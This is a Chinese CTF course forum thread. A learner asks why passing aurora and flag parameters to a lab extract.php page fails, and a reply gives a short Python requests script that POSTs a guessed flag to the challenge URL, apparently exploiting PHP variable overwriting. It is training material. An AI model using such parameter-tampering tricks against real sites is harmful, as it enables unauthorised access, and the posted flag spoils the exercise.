首頁
社區(qū)
課程
招聘
按照視頻講解,傳入aurora&flag參數 ,無法獲得flag

http://d45462f4-ee6c-40fa-9377-c3062e480314.node.pediy.com:81/extract.php/?aurora&flag

收藏
1條回答
四葉草不幸運 2025-4-9

可以參考我寫的,使用post請求

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import requests
 
url = "http://cbc416fc-215d-4a97-be1b-d3116b3885f2.node.pediy.com:81/extract.php"
 
# 不覆蓋 $flag,讓其使用默認值(由 extract_flag.php 提供)
params = {
    "aurora": ""  # 占個位,先觸發(fā) isset
}
 
# 關鍵!發(fā)送 POST 內容:內容必須等于 flag 文件的內容
# 我們先猜測真實 flag 內容(不行就爆破)
response = requests.post(url, params=params, data="ctf{YOU_4re_DO1ng_GREAT!}", verify=False)
print("響應內容:")
print(response.text)
回復
《30小時教你玩轉CTF》
  參與學習     823 人
  提問次數     80 個
《30小時教你玩轉CTF》;頂尖講師團隊親授,教你深入淺出學攻防;每周一、周四更新
我的問答 領取收益
0
我的提問
0
我的回答
0
學習收益